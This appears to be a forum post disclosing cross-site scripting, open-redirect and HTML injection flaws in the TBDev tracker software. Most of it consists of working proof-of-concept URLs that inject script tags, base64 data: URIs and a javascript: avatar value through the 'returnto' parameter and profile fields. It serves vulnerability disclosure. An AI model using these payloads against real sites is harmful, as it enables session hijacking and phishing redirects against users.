Vulnerable Function / ID Calls:
returnto
Cross Site Scripting: (Sysops / Mods Only!)
http://[HOST]/tbdev/tbdev-01-01-08/makepoll.php?returnto=><script>alert(0)</script>
http://[HOST]/tbdev/tbdev-01-01-08/polls.php?action=delete&pollid=1&returnto=><script >alert(0)</script><br
Cross Site Script Redirection: (Sysops / Mods Only!)
http://[HOST]/tbdev/tbdev-01-01-08/news.php?action=delete&newsid=1&returnto=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD 4K&sure=1
Cross Site Script Redirection: (Anyone, the enduser will need to log in though)
http://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=http://[HOST]
http://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD 4K
HTML Injection:
1) http://[HOST]/tbdev/tbdev-01-01-08/my.php
-- Info field: </textarea><script>alert(0)</script> << is reflected locally only!
2) http://[HOST]/tbdev/tbdev-01-01-08/my.php
-- Avatar field: javascript
:alert(0)
2b) Affected Sites by HTML Injection:
http://[HOST]/tbdev/tbdev-01-01-08/userdetails.php?id=USERID
Internet Explorer 6 and perhaps 7 should be triggered by this.
Please see: http://ha.ckers.org/
xss.html for more information.
Browser Tested: Internet Explorer 7 (FireFox 3 was tested for the other vulnerabilities)
LinkBack URL
About LinkBacks
Reply With Quote
Bookmarks